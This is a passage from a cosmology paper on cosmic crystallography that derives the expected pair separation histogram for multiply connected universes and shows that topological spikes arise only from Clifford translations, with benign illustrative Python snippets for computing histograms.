separation is $s$. Formally, this is given by the function
\begin{eqnarray*}
\eta : (0,4R^2] & \rightarrow & [0,\infty) \\
s & \mapsto & \frac{1}{2} \, \mbox{Card}(\Delta^{-1}(s))\;,
\end{eqnarray*}
where, as usual, Card$(\Delta^{-1}(s))$ is the number of
elements of the set $\Delta^{-1}(s)$, and $\Delta$ is the map
\begin{eqnarray*}
\Delta : \mathcal{C} \times \mathcal{C} & \rightarrow
& [0,4R^2] \\
(p,q) & \mapsto & d^2(p,q) \; .
\end{eqnarray*}
Clearly, the distance $d(p,q)$ between sources $p,q \in
\mathcal{C}$ is calculated using the geometry one is concerned
with. The factor 1/2 in the def\/inition of $\eta$ accounts
for the fact that the pairs $(p,q)$ and $(q,p)$ are indeed
the same pair.
The next step is to divide the interval $(0,4R^2]$ in $m$
equal subintervals of length $\delta s = 4R^2/m$. Each
subinterval has the form
\begin{displaymath}
J_i = (s_i - \frac{\delta s}{2} \, , \, s_i + \frac{\delta
s}{2}] \qquad ; \qquad i=1,2, \dots ,m \; ,
\end{displaymath}
with centre
\begin{displaymath}
s_i = \,(i - \frac{1}{2}) \,\, \delta s \;.
\end{displaymath}
The PSH is then obtained from
\begin{equation}
\label{histograma}
\Phi(s_i)=\frac{2}{N(N-1)}\,\,\frac{1}{\delta s}\,
\sum_{s \in J_i} \eta(s) \;,
\end{equation}
where $N$ is the number of sources in the catalogue $\mathcal{C}$.
The coef\/f\/icient of the sum is a normalization constant such
that
\begin{equation}
\sum_{i=1}^m \Phi(s_i)\,\, \delta s = 1 \, .
\end{equation}
Note that the sum in~(\ref{histograma}) is just a counting of the
number of pairs of sources separated by a distance whose square
lies in the subinterval $J_i$, hence $\Phi(s_i)$ is a normalized
counting.
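The procedure above can be condensed into a short routine. The sketch below (illustrative only) implements the normalized counting of eq.~(\ref{histograma}) for a catalogue given as an array of positions, assuming Euclidean geometry for the distance $d(p,q)$; for other 3-geometries one would only swap the separation computation.

```python
import numpy as np

def psh(points, R, m):
    """Normalized pair separation histogram Phi(s_i).

    points : (N, 3) array of comoving positions (Euclidean geometry is
             assumed here purely for illustration).
    R      : survey depth; squared separations are binned over (0, 4R^2].
    m      : number of equal-width subintervals J_i.
    Returns (s_centres, Phi).
    """
    points = np.asarray(points, dtype=float)
    N = len(points)
    # squared separations of the N(N-1)/2 distinct pairs
    diff = points[:, None, :] - points[None, :, :]
    s = np.sum(diff ** 2, axis=-1)[np.triu_indices(N, k=1)]
    delta_s = 4.0 * R ** 2 / m
    counts, edges = np.histogram(s, bins=m, range=(0.0, 4.0 * R ** 2))
    # normalization 2 / (N (N-1) delta_s), as in the text
    phi = 2.0 / (N * (N - 1)) / delta_s * counts
    centres = 0.5 * (edges[:-1] + edges[1:])
    return centres, phi
```

With all squared separations inside $(0,4R^2]$, the normalization $\sum_i \Phi(s_i)\,\delta s = 1$ then holds by construction.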
It should be stressed that throughout this paper we use normalized
histograms instead of just plots of countings as in~\cite{LeLaLu}
and~\cite{Fagundes-Gausmann}. In doing so we can compare histograms
built up from catalogues with a dif\/ferent number of sources.
Further, although the PSH is actually the plot of the function
$\Phi(s_i)$, the function $\Phi(s_i)$ itself can be looked upon as
the PSH. So, in what follows we shall refer to $\Phi(s_i)$ simply
as the PSH.
As mentioned in the previous section, in a multiply connected
universe the periodic distribution of images on $\widetilde{M}\,$
(due to the covering group) gives rise to correlations in their
positions, and these correlations can be translated into
correlations in distances between pairs of images.
For a better understanding on how these distance correlations
arise let us consider the same example used by Fagundes and
Gausmann~\cite{Fagundes-Gausmann} to clarify the method of
cosmic crystallography. In their work they have assumed that the
distribution of objects in $M$ is uniform and the catalogue is the
whole set of observable images. In the Euclidean 3-manifold
they have studied, take a $g$-pair $(p,gp)$ such that for a
generic point $p=(x,y,z)$ we have $gp=(x-L,-y+2L,-z)$. The squared
separation between these points is given by
\begin{equation}
\label{example}
d^2 = 5L^2 - 8Ly + 4y^2 + 4z^2 \; .
\end{equation}
{}From this equation we have the following: f\/irstly, that the
separation of any other neighboring $g$-pair%
\footnote{We say that two $g$-pairs $(p,gp)$ and $(q,gq)$ are
neighbors if the points $p$ and $q$, and thus the points $gp$ and
$gq$, are neighbors.}
$(q,gq)$ will be close to $d$; secondly,
several distant $g$-pairs are separated by approximately
the same distance; and thirdly, not all $g$-pairs
are separated by the same distance (these items hold for the
isometry $g$ used in this example, of course). Actually, the
separation of any $g$-pair in Euclidean geometry is independent
of the pair only when the isometry $g$ is a translation.
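A quick numerical check of eq.~(\ref{example}) may be helpful here. The sketch below (illustrative only) verifies the squared separation for the isometry $gp=(x-L,\,-y+2L,\,-z)$ at random points, and contrasts it with a pure translation, for which the separation is the same for every pair; the sample ranges are arbitrary.

```python
import random

def d2(p, q):
    """Squared Euclidean separation between two points."""
    return sum((a - b) ** 2 for a, b in zip(p, q))

L = 1.0
screw = lambda p: (p[0] - L, -p[1] + 2 * L, -p[2])   # isometry of eq. (example)
trans = lambda p: (p[0] + L, p[1], p[2])             # a pure translation

random.seed(1)
for _ in range(100):
    p = tuple(random.uniform(-2.0, 2.0) for _ in range(3))
    x, y, z = p
    # separation of the g-pair agrees with 5L^2 - 8Ly + 4y^2 + 4z^2 ...
    assert abs(d2(p, screw(p)) - (5 * L**2 - 8 * L * y + 4 * y**2 + 4 * z**2)) < 1e-9
    # ... while for the translation it is L^2 for every pair
    assert abs(d2(p, trans(p)) - L**2) < 1e-9
```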
To sum up, this example suggests that in general
correlations associated with translations
manifest as spikes in PSH's, whereas correlations due to
other isometries are evinced through small
deviations from the histogram due to uncorrelated pairs.
This conjecture will be proved in the following two sections.
The distribution of cosmic objects may not be exactly
homogeneous, nor any catalogue will consist of all the observable
sources. For instance, the objects may present some clustering
or may obey a fractal distribution, while luminosity threshold
and obscuration ef\/fects limit our observational
capabilities. We shall show in the following section that
the consideration of these aspects does not destroy the
above-described picture, which was qualitatively inferred from
general arguments and illustrated through the above specif\/ic
example.
\section{The expected PSH}
\label{pshexp}
\setcounter{equation}{0}
In this section we shall use elements from probability theory
(see for example~\cite{Rohatgi}) to show that the above
qualitative description of the distance correlations in a PSH
holds in a rather general framework. We shall make clear that
this picture does not depend on the construction rules one uses
to build a catalogue. Recall that the construction rules to build
a catalogue $\mathcal{C}$ from an observed universe $\mathcal{U}$
consist of a well-behaved distribution law,
of which the set of objects in $M(t_0)$ is a representative sample,
and of selection rules which dictate how the catalogue is obtained
{}from the set of all observable images $\mathcal{O}$.
The general underlying setting of the calculations in this section is
the existence of an ensemble of catalogues comparable to a given
catalogue $\mathcal{C}$ (real or simulated), with the same number
of sources $N$ and corresponding to the same constant curvature
3-manifold $M(t_0)$. So, the construction rules permit the
computation of probabilities and expected values of quantities which
depend on the sources in the catalogue $\mathcal{C}$.
Our basic aim now is to compute the expected number, $\eta_{exp}(s_i)$,
of observed pairs of cosmic sources in a catalogue $\mathcal{C}$ of the
ensemble with squared separations in $J_i$. Having $\eta_{exp}(s_i)$ we
clearly have the \emph{expected} pair separation histogram (EPSH) which
is given by
\begin{equation}
\label{def-EPSH}
\Phi_{exp}(s_i) = \frac{2}{N(N-1)}\,\,\frac{1}{\delta s} \,\,
\eta_{exp}(s_i) \, .
\end{equation}
We remark that the EPSH carries all the relevant information
of the distance correlations due to the covering group since
\begin{equation} \label{noise-def1}
\Phi(s_i) = \Phi_{exp}(s_i) + \mbox{statistical f\/luctuations} \; ,
\end{equation}
where $\Phi(s_i)$ is the PSH constructed with $\mathcal{C}$.
It can be shown (see Appendix A for a proof) that the expected number
$\eta_{exp}(s_i)$ can be decomposed into its uncorrelated
part and its correlated part as
\begin{equation}
\label{num-tot}
\eta_{exp}(s_i) = \eta_u(s_i) + \frac{1}{2}\, \sum_{g \in
\widetilde{\Gamma}} \eta_g(s_i) \;,
\end{equation}
where $\eta_u(s_i)$ is the expected number of observed
uncorrelated pairs of sources with squared separations in
$J_i$, i.e. pairs of sources that are not $\Gamma$-pairs;
and $\eta_g(s_i)$ is the expected number of observed $g$-pairs
whose squared separations are in $J_i$. $\widetilde{\Gamma}$
is the covering group $\Gamma$ without the identity map, and
the factor 1/2 in the sum accounts for the fact that, in
considering all non-trivial covering isometries, we are counting
each $\Gamma$-pair twice, since if $(p,q)$ is a $g$-pair,
then $(q,p)$ is a $(g^{-1})$-pair.
For each isometry $g \in \widetilde{\Gamma}$ let us consider
the function
\begin{eqnarray*}
X_g : \widetilde{M}(t_0) & \to & \; [0,\infty) \\
p \quad & \mapsto & d^2(p,gp) \; .
\end{eqnarray*}
This function is a random variable, and using the construction
rules we can calculate the probability that an observed $g$-pair
is separated by a squared distance that lies in $J_i$,
\begin{equation}
\label{prob-g-pairs}
F_g(s_i) = P[X_g \in J_i] \; .
\end{equation}
The construction rules allow us to compute also the expected
number $N_g$ of $g$-pairs in a catalogue $\mathcal{C}$ with $N$
sources. Clearly in a catalogue with twice the number of sources
there will be $2N_g$ $g$-pairs. Actually, $N_g$ is proportional
to $N$ so we write
\begin{equation} \label{nug}
N_g = N \, \nu_g \; ,
\end{equation}
with $0 \leq \nu_g < 1$.
The expected number of observed $g$-pairs with squared separation
in $J_i$ is thus given by the product of $N_g$ times the
probability that an observed $g$-pair has its squared separation
in $J_i$,
\begin{equation} \label{nu_g}
\eta_g(s_i) = N \,\nu_g \, F_g(s_i) \; .
\end{equation}
In order to examine uncorrelated pairs, we now consider the
random variable
\begin{eqnarray*}
X : \widetilde{M}(t_0) \times \widetilde{M}(t_0) & \to & [0,\infty) \\
(p,q)\qquad & \mapsto & d^2(p,q) \; .
\end{eqnarray*}
The probability that an observed uncorrelated pair $(p,q)$ is
separated by a squared distance that lies in $J_i$,
\begin{equation}
F_u(s_i) = P[X \in J_i] \; ,
\end{equation}
can also be calculated from the construction rules. Thus, the
expected number of observed uncorrelated pairs with squared
separation in $J_i$ is
\begin{equation} \label{eta_u}
\eta_u(s_i) = \left[\,\frac{1}{2}\,N(N-1)- \frac{1}{2}\,N \,\sum_{g
\in \widetilde{\Gamma}} \,\nu_g \,\right] F_u(s_i) \;,
\end{equation}
where we have used~(\ref{nu_g}) and that clearly the expected number
$N_u$ of uncorrelated pairs is such that
\begin{equation} \label{Nu}
N_u + \frac{1}{2}\,\sum_{g \in \widetilde{\Gamma}} \,N_g =
\frac{1}{2}\, N(N-1) \;.
\end{equation}
{}From~(\ref{def-EPSH}),(\ref{num-tot}), (\ref{eta_u}) and
(\ref{Nu}) an explicit expression for the EPSH is thus
\begin{equation}
\label{EPSH}
\Phi_{exp}(s_i) = \frac{1}{\delta s}\,\,\frac{1}{N-1}
\left[\,2\, \frac{N_u}{N} \,\,F_u(s_i) +
\,\sum_{g \in \widetilde{\Gamma}} \,\nu_g\, F_g(s_i)
\,\right] \; ,
\end{equation}
where the sum in (\ref{EPSH}) is a f\/inite sum since $\nu_g$
is nonzero only for a f\/inite number of isometries.
For a multiply connected manifold $M$, def\/ining
\begin{eqnarray}
\Phi_{exp}^{u}(s_i) & = & \frac{1}{\delta s}\, F_u(s_i) \;, \label{EPSHu} \\
\Phi_{exp}^{g}(s_i) & = & \frac{1}{\delta s} \,F_g(s_i) \;, \label{EPSHg}
\end{eqnarray}
we obtain a more descriptive expression for the EPSH, namely
\begin{equation} \label{EPSH2}
\Phi_{exp}(s_i) = \frac{1}{N-1}\,\, [\,\nu_u\,\Phi_{exp}^{u}(s_i) +
\, \sum_{g \in \widetilde{\Gamma}} \nu_g\, \Phi_{exp}^g(s_i)
\, ] \;,
\end{equation}
where by analogy with (\ref{nug}) we have def\/ined
$\nu_u = 2\,N_u/\,N\,$.
{}From~(\ref{EPSH2}) it is apparent that the EPSH corresponding
to a multiply connected manifold is an EPSH in which the
contributions arising from the $\Gamma$-pairs have been withdrawn,
plus a term that consists of a sum of individual contributions
{}from each covering isometry.
When the manifold $M(t_0)$ which gives rise to the comparable
catalogues is simply connected ($\widetilde{\Gamma}=\emptyset$)
all $N(N-1)/2$ pairs are uncorrelated, and so from~(\ref{def-EPSH})
one clearly has
\begin{equation} \label{EPSHsc}
\Phi^{sc}_{exp}\,(s_i) = \frac{2}{N(N-1)}\,\frac{1}{\delta s}\,\,
\eta^{sc}_{exp}\,(s_i)
= \frac{1}{\delta s} \,F_{sc}\,(s_i) \;,
\end{equation}
where $F_{sc}\,(s_i)$ is the probability that a pair of sources
is separated by a squared distance that lies in $J_i$.
It turns out that the combination (which can be obtained
{}from~(\ref{Nu}) and~(\ref{EPSH2}))
\begin{equation} \label{topsig1}
(N-1)[\,\Phi_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,] =
\nu_u\,\, [\,\Phi^{u}_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,]
+ \sum_{g \in \widetilde{\Gamma}} \nu_g\,
[\, \Phi^g_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,]
\end{equation}
proves to exhibit a clear signal of the topology of $M(t_0)$
(see~\cite{GRT00}~--~\cite{GRT01}, already available
in the gr-qc archive, for more details, including numerical
simulations and plots).
This motivates the def\/inition of the following quantity:
\begin{equation} \label{topsig2}
\varphi^S(s_i) =
\nu_u\,\,[\,\Phi^{u}_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,]
+ \sum_{g \in \widetilde{\Gamma}} \nu_g\,
[\, \Phi^g_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,] \;,
\end{equation}
which throughout this paper is referred to as \emph{topological
signature\/} of the multiply connected manifold $M(t_0)$,
and clearly arises from the ensemble of catalogues of
discrete sources $\mathcal{C}\,$.
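Equation~(\ref{topsig2}) is straightforward to evaluate once the building blocks are in hand. The sketch below (illustrative only) computes $\varphi^S(s_i)$ from the per-bin probabilities $F_u$, $F_g$, $F_{sc}$ and the densities $\nu_u$, $\nu_g$; all numerical inputs in the accompanying test are synthetic placeholders, not values derived from any particular manifold.

```python
import numpy as np

def topological_signature(nu_u, F_u, nu_g_list, F_g_list, F_sc, delta_s):
    """phi^S(s_i) of eq. (topsig2), built from EPSH ingredients.

    Each F array holds per-bin probabilities, so that the corresponding
    expected histogram is Phi_exp = F / delta_s.  nu_g_list / F_g_list
    run over the non-trivial covering isometries with nu_g != 0
    (a finite set, as noted in the text).
    """
    phi_u = np.asarray(F_u) / delta_s
    phi_sc = np.asarray(F_sc) / delta_s
    sig = nu_u * (phi_u - phi_sc)
    for nu_g, F_g in zip(nu_g_list, F_g_list):
        sig += nu_g * (np.asarray(F_g) / delta_s - phi_sc)
    return sig
```

A Clif\/ford translation, whose $F_g$ is concentrated in a single subinterval, contributes a sharp spike to $\varphi^S$; a smooth $F_g$ contributes only a broad deformation.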
Equation~(\ref{topsig2}) makes explicit that (i) both the
$\Gamma$-pairs and the uncorrelated pairs which arise
from the covering isometries give rise to the topological
signature; and it also ensures that (ii)
the topological signature ought to arise in PSH's even
when there are only a few images for each object.
\section{Further results}
\label{fres}
\setcounter{equation}{0}
{}From eqs.~(\ref{prob-g-pairs}) and~(\ref{EPSHg}) we note that
when $g$ is a Clif\/ford translation (i.e. an isometry such
that for all $p \in \widetilde{M}(t_0)$, the distance
$|g|= d(p,gp)$ is independent of $p$) we have
\begin{eqnarray}
\Phi_{exp}^g(s_i) & = & \left\{ \begin{array}
{l@{\qquad}l}
0 & \mbox{if $\quad |g|^2 \,\notin\, J_i$} \\ (\delta s)^{-1} &
\mbox{if $\quad |g|^2 \,\in \,J_i$ .}
\end{array} \right.
\end{eqnarray}
Thus from equation~(\ref{EPSH2}) one has that the contribution
of each translation $g$ to the EPSH is a spike of amplitude
$\nu_g\,[\,(N-1)\delta s\,]^{-1}$ at a well-def\/ined
subinterval $J_{i_g}$ (say), minus a term proportional to
the EPSH $\Phi_{exp}^{u}(s_i)$
for all $i=1, \dots ,i_g, \dots , m$. On the other hand,
when $g$ is not a Clif\/ford translation, the separation $|g|$
depends smoothly on the $g$-pair because it is a
composition of two smooth functions: the distance function
and the isometry $g$. Moreover, the value it takes ranges
over a fairly wide interval, so $F_g(s_i)$ will be non-zero for
several subintervals $J_i$. In brief, from~(\ref{EPSH2})
we conclude that topological spikes in PSH's are due \emph{only} to
Clif\/ford translations, whereas other isometries manifest
as tiny deformations of the PSH corresponding to the
simply connected case.
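This conclusion can be seen numerically in a few lines. The sketch below (illustrative only) draws a sample of image positions, computes the $g$-pair squared separations for a pure translation and for the non-translational isometry of eq.~(\ref{example}), and counts how many subintervals each set occupies; the sample size, cell side and bin count are arbitrary choices.

```python
import numpy as np

rng = np.random.default_rng(42)
L = 1.0
p = rng.uniform(0.0, L, size=(5000, 3))   # sample of image positions

# squared g-pair separations: translation vs. screw motion of eq. (example)
s_trans = np.full(len(p), L**2)           # |g| is constant: one subinterval
gp = np.column_stack([p[:, 0] - L, -p[:, 1] + 2 * L, -p[:, 2]])
s_screw = np.sum((p - gp) ** 2, axis=1)   # varies from pair to pair

bins = np.linspace(0.0, s_screw.max() + 1e-9, 50)
occupied = lambda s: np.count_nonzero(np.histogram(s, bins=bins)[0])
# the translation feeds a single subinterval (a spike), whereas the
# screw motion spreads its g-pairs over many subintervals
print(occupied(s_trans), occupied(s_screw))
```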
We emphasize that the above general result holds regardless
of the underlying geometry, and for any set of construction
rules. Further, when one restricts the above result to specif\/ic
geometries, then one arrives at two rather important consequences,
which we shall discuss in what follows.
Let us f\/irst consider the consequence for the particular case
of Euclidean manifolds.
It is known that any compact Euclidean 3-manifold $M$ is
f\/initely covered by a 3-torus~\cite{Wolf}. Let $\Gamma$ be
the universal covering group of $M$, then the universal covering
group of that 3-torus (consisting exclusively of translations)
is a subgroup of $\Gamma$. Moreover, there is a covering 3-torus
of $M$ such that its covering group consists of all the translations
contained in $\Gamma$.%
\footnote{The simplest example of this is a cubic
\emph{half-twisted 3-torus}~\cite{Instantons}, or cubic
$\mathcal{G}_2$ manifold in Wolf's notation~\cite{Wolf},
which is doubly covered by a rectangular 3-torus with the same
square base but with a height twice the base side.
This is easily seen by stacking two cubes def\/ining $\mathcal{G}_2$
one on top of the other, the common face being the one that is
twisted for an identif\/ication.}
Thus, PSH's of $M$ and of this minimal covering 3-torus,
built from comparable catalogues with the same number of sources,
have the same spike spectrum of topological origin, i.e. the
same set of topological spikes with equal positions and amplitudes.
Therefore the topological spikes alone are not suf\/f\/icient
for distinguishing these compact f\/lat manifolds, making clear
that even if the universe is f\/lat ($\Omega_{tot}=1$) the
spike spectrum is not enough for determining its global
shape.
Consider now the consequence of our major result for the
special case of hyperbolic manifolds. Since there are no
Clif\/ford translations in hyperbolic geometry~\cite{Ratcliffe},
there are no topological spikes in PSH's built from these manifolds.
This result was not expected from the outset in that it has been
claimed that spikes are a characteristic signature of topology
in cosmic crystallography, at least for f\/lat manifolds%
~\cite{LeLaLu,Fagundes-Gausmann} (see, however, in this regard
the references~\cite{LeLuUz}~--~\cite{FagGaus}).
As a matter of fact, this result is in agreement with simulations
performed in the cases of Weeks~\cite{LeLuUz} and Best~\cite{FagGaus}
hyperbolic manifolds (see, however, the next section for a
comparison of our results with theirs).
Incidentally, it can also be f\/igured out from~(\ref{EPSH2})
that when $g$ is not a translation, and since the probabilities
$F_g(s_i)$ are non-zero for several subintervals $J_i$, then
the contribution of these isometries to the EPSH is in practice
negligible for $N \approx 2000$ as used in~\cite{LeLaLu} and
very small for $N \approx 250$ as used in~\cite{Fagundes-Gausmann}.
In both papers these contributions are hidden by statistical
f\/luctuations and, thus, are not revealed by the isolated
PSH's they have plotted.
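To make the role of the isometry type concrete, the following toy computation (ours, not from the text; the specific maps and the shift of $0.5$ are illustrative) shows that every $g$-pair of a pure translation shares one and the same separation — the delta-like spike — whereas a screw motion, the kind of identification that defines the half-twisted 3-torus, spreads its $g$-pairs over a broad range:

```python
import math
import random

def g_pair_separations(points, g):
    """Euclidean separations of the pairs (p, g(p)) for a covering isometry g."""
    return [math.dist(p, g(p)) for p in points]

def translation(p):
    # a pure translation (a Clifford translation of Euclidean space)
    return (p[0], p[1], p[2] + 0.5)

def half_turn_screw(p):
    # rotation by pi about the z-axis followed by the same translation,
    # the kind of identification that defines the half-twisted 3-torus
    return (-p[0], -p[1], p[2] + 0.5)

random.seed(1)
points = [(random.random(), random.random(), random.random()) for _ in range(500)]

sep_t = g_pair_separations(points, translation)
sep_s = g_pair_separations(points, half_turn_screw)

# all translation g-pairs share one separation -> a sharp spike in the PSH ...
assert max(sep_t) - min(sep_t) < 1e-12
# ... while the screw motion smears its g-pairs over a wide range of bins
assert max(sep_s) - min(sep_s) > 0.5
```

In a PSH the first set of separations piles up in a single bin, while the second is diluted over many bins, where for catalogues of a few hundred or a few thousand sources it is easily buried by the statistical fluctuations — precisely the situation described above.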
{}From what we have seen hitherto it turns out that cosmic
crystallography, as originally formulated, is not a
conclusive method for unveiling the shape of our universe
since (i) in the Euclidean case the topological spikes will
tell us that spacetime is multiply connected at some scale,
leaving in some instances its shape undetermined, and (ii)
in the hyperbolic case, as there are no translations (and
therefore no topological spikes), it is even impossible to
distinguish any hyperbolic manifold with non-trivial topology from
the simply connected manifold $H^3$. Improvements of the cosmic
crystallography method are therefore necessary.
\begin{sloppypar}
In the remainder of this section we will brief\/ly discuss a
f\/irst approach which ref\/ines upon that method.
We look for a means of reducing the statistical f\/luctuations
well enough to leave a visible signal of the non-translational
isometries in a PSH. On theoretical ground, the simplest way
to accomplish this is to use several comparable
catalogues, with approximately equal number of cosmic sources,
for the construction of a \emph{mean} pair
separation histogram (MPSH). For suppose we have $K$ catalogues
$\mathcal{C}_k$ ($k=1,2,\dots,K$) with PSH's given by
\end{sloppypar}
\begin{equation} \label{sample-PSH}
\Phi_k(s_i) = \frac{2}{N_k(N_k-1)}\, \frac{1}{\delta s}\,
\sum_{s \in J_i} \eta_k(s)
\end{equation}
with $N_k = \mbox{Card}(\mathcal{C}_k)$. The MPSH def\/ined
by
\begin{equation} \label{meanPhi}
<\Phi(s_i)>\; = \frac{1}{K} \,\sum_{k=1}^K \Phi_k(s_i)
\end{equation}
is, in the limit $K \to \infty$, approximately equal to
the EPSH. Actually, equality holds when all catalogues have
exactly the same number of sources. However, it can be
shown (see Appendix B for details) that even when the
catalogues do not have exactly the same number $N$ of
sources, in f\/irst order approximation we still
have
\begin{equation} \label{limit1}
\Phi_{exp}(s_i) = \lim_{K \rightarrow \infty} <\Phi(s_i)>\;.
\end{equation}
Elementary statistics tells us that the statistical f\/luctuations
in the MPSH are reduced by a factor of $1/\sqrt{K}$, which makes
at f\/irst sight the MPSH method very attractive.
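As an illustration of the averaging, the sketch below (our toy setup: sources drawn uniformly in a unit cube, far fewer than in a realistic catalogue) builds PSH's according to eq.~(\ref{sample-PSH}) and their mean according to eq.~(\ref{meanPhi}); the fluctuations of the mean are visibly smaller:

```python
import math
import random

def psh(points, n_bins=25, s_max=math.sqrt(3.0)):
    """Normalized pair separation histogram, as in eq. (sample-PSH)."""
    n = len(points)
    ds = s_max / n_bins
    counts = [0] * n_bins
    for a in range(n):
        for b in range(a + 1, n):
            i = min(int(math.dist(points[a], points[b]) / ds), n_bins - 1)
            counts[i] += 1
    return [2.0 * c / (n * (n - 1) * ds) for c in counts]

def mpsh(catalogues):
    """Mean pair separation histogram over K comparable catalogues, eq. (meanPhi)."""
    hists = [psh(c) for c in catalogues]
    return [sum(col) / len(hists) for col in zip(*hists)]

def rms_diff(h1, h2):
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(h1, h2)) / len(h1))

random.seed(7)
cat = lambda: [(random.random(), random.random(), random.random()) for _ in range(60)]

# two independent single PSH's fluctuate against each other ...
d_single = rms_diff(psh(cat()), psh(cat()))
# ... while two independent MPSH's (K = 25 each) agree roughly 1/sqrt(K) better
d_mean = rms_diff(mpsh([cat() for _ in range(25)]), mpsh([cat() for _ in range(25)]))
assert d_mean < d_single
```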
It should be noticed, however, that since in practice it is
not at all that easy to obtain many comparable real catalogues of
cosmic sources, this method will hardly be useful in analyses
which rely on real catalogues. On the other hand, since there is no
problem in generating hundreds of comparable (simulated) catalogues
in a computer, the construction of MPSH's can easily be implemented
in simulations, and so the MPSH method is a suitable approach for
studying the role of non-translational isometries in PSH's.
The use of the MPSH technique to extract the
topological signature of non-translational isometries (including
numeric simulation) is described in~\cite{GRT00}~--~\cite{GRT01}.
\section{Conclusions and further remarks}
\label{concl}
\setcounter{equation}{0}
In this section we begin by summarizing our main results,
proceed by brief\/ly indicating possible approaches for further
investigations, and end by discussing the connection between
ours and the results recently reported in the references%
~\cite{LeLuUz} and~\cite{FagGaus}.
\vspace{5mm}
\noindent \textbf{\large Main results}
\vspace{3mm}
In this work we have derived the expression~(\ref{EPSH2})
for the expected pair separation histogram (EPSH) for an ensemble
of comparable catalogues with the same number of sources, and
corresponding to spacetimes whose spacelike sections are any one
of the possible 3-manifolds of constant curvature. The EPSH
is essentially a typical PSH from which the statistical noise
has been withdrawn, so it carries all the relevant information
of the distance correlations due to the covering group of $M$.
The EPSH~(\ref{EPSH2}) we have obtained holds in a rather general
topological-geometrical-observational setting, that is to say it
holds when the catalogues of the ensemble obey a well-behaved
distribution law (needed to ensure that the sources are not
concentrated in small regions) plus a set of selection rules
(which dictate how the catalogues ${\cal C\/}$ are obtained
{}from the set of observable images ${\cal O}\,$).
It turns out that the EPSH of a multiply connected manifold is
an EPSH in which the contributions that arise from
the $\Gamma$-pairs have been withdrawn, plus a sum of
individual contributions from each covering isometry.
{}From~(\ref{EPSH2}) and (\ref{topsig2}) we have also found
that the topological signature (contribution of the
multiply-connectedness) ought to arise even when there are
just a few images of each object.
Our theoretical study of distance correlations in pair separation
histograms elucidates the ultimate nature of the spikes and the
role played by isometries in PSH's.
Indeed, from the expression~(\ref{EPSH2}) of the EPSH we obtain our
major consequence, namely that the spikes of topological origin in
single PSH's are only due to the translations of the covering group,
whereas correlations due to the other (non-translational) isometries
manifest as small deformations of the PSH of the underlying
universal covering manifold. This result holds regardless of
the (well-behaved) distribution of objects in the universe, and of
the observational limitations that constrain, for example, the
deepness and completeness of the catalogues, as long as they
contain enough $\Gamma$-pairs to yield a clear signal.
\begin{sloppypar}
Besides clarifying the ultimate origin of spikes and revealing
the role of non-translational isometries, the above-mentioned major
result gives rise to two others:
\end{sloppypar}
\begin{itemize}
\item
That distinct Euclidean manifolds which admit the same
translations in their covering groups present the same
spike spectrum of topological nature. So, the set of topological
spikes in the PSH's is not suf\/f\/icient for distinguishing
these compact f\/lat manifolds, making clear that even if the
universe is f\/lat ($\Omega_{tot}=1$) the spike spectrum may not
be enough for determining its global shape;
\item
That individual pair separation histograms corresponding to
hyperbolic 3-manifolds exhibit no spikes of topological origin,
since there are no Clif\/ford translations in hyperbolic
geometry.
\end{itemize}
These two corollaries in turn ensure that cosmic crystallography,
as originally formulated, is not a conclusive method for unveiling
the shape of the universe and improvements of the method are
thus necessary.
Any means of reducing the statistical noise well enough for
revealing the correlations due to non-translational isometries
should be in principle considered.
Perhaps the simplest way to accomplish this is through the
use of the MPSH method that we have also presented; that
is to say by using several comparable catalogues to construct
MPSH's.
The major drawback of this approach, in practice, is the
dif\/f\/iculty of constructing comparable catalogues of real
sources.
Nevertheless, the MPSH method is suitable for studying
the contributions of non-translational isometries in PSH's by
computer simulations since there is no problem in constructing
hundreds of simulated comparable catalogues.
A detailed account of the MPSH technique, including
numeric simulation, can be found in~\cite{GRT00}~--~\cite{GRT01}.
\vspace{6mm}
\noindent \textbf{\large Further research}
\vspace{3mm}
Any other means of reducing the statistical noise could serve
to extract all distance correlations, not just those due to
translations. Therefore, a good
approach to this issue is perhaps to study quantitatively the
noise of PSH's in order to develop f\/ilters. Another scheme for
extracting these correlations from PSH's is to modify what we
have def\/ined to be an observed universe to make stronger the
signal which results from the non-translational isometries.
These ideas are currently under investigation by our research
group.
The main disadvantages of the known statistical approaches to
determine the topology of our universe from discrete
sources are that they all assume that: (i) the scale factor
$a(t)$ is accurately known, so one can compute distances
{}from redshif\/ts; (ii) all objects are comoving to a
very good approximation, so multiple images are where
they ought to be; and (iii) the objects have very long
lifetimes, so there exist images of the same object at very
dif\/ferent distances from one of our images. These are rather
unrealistic assumptions, and no method will be ef\/fective
unless it abandons these simplifying premises.
Our idea of a suitable choice of data in catalogues (def\/ined
to be a choice of observed universe) seems to be powerful
enough to circumvent these problems. Indeed, if one takes as
observed universe a thin spherical shell, instead of a ball,
all the sources will be at almost the same distance from the
observer, and (i) we do not need to know what this distance
is since we can look for angular correlations between pairs
of sources, instead of distance correlations, therefore avoiding
the need of knowing the scale factor, (ii) it is unimportant
whether they are comoving sources because all of them are now
contemporaneous, and so (iii) it is also irrelevant if they
have short lifetimes. In the thin spherical shell one can
look for angular correlations among $\Gamma$-pairs instead
of the distance correlations of the crystallographic method.
This approach is also currently under study by our research
group.
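A minimal sketch of the shell variant (ours; isotropic source directions, no topological identifications included) makes the point that only the directions of the sources enter, never their distances:

```python
import math
import random

def angular_psh(directions, n_bins=18):
    """Histogram of pair angular separations for sources on a thin shell.

    Only the directions of the sources enter; no scale factor and no
    distance information are needed.
    """
    counts = [0] * n_bins
    dtheta = math.pi / n_bins
    for a in range(len(directions)):
        for b in range(a + 1, len(directions)):
            dot = sum(x * y for x, y in zip(directions[a], directions[b]))
            theta = math.acos(max(-1.0, min(1.0, dot)))
            counts[min(int(theta / dtheta), n_bins - 1)] += 1
    return counts

def random_direction(rng):
    # uniform direction on the unit sphere
    z = rng.uniform(-1.0, 1.0)
    phi = rng.uniform(0.0, 2.0 * math.pi)
    r = math.sqrt(1.0 - z * z)
    return (r * math.cos(phi), r * math.sin(phi), z)

rng = random.Random(3)
dirs = [random_direction(rng) for _ in range(200)]
hist = angular_psh(dirs)
assert sum(hist) == 200 * 199 // 2   # every pair lands in exactly one bin
```

Angular correlations among $\Gamma$-pairs would show up as deviations of such a histogram from the smooth simply connected expectation.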
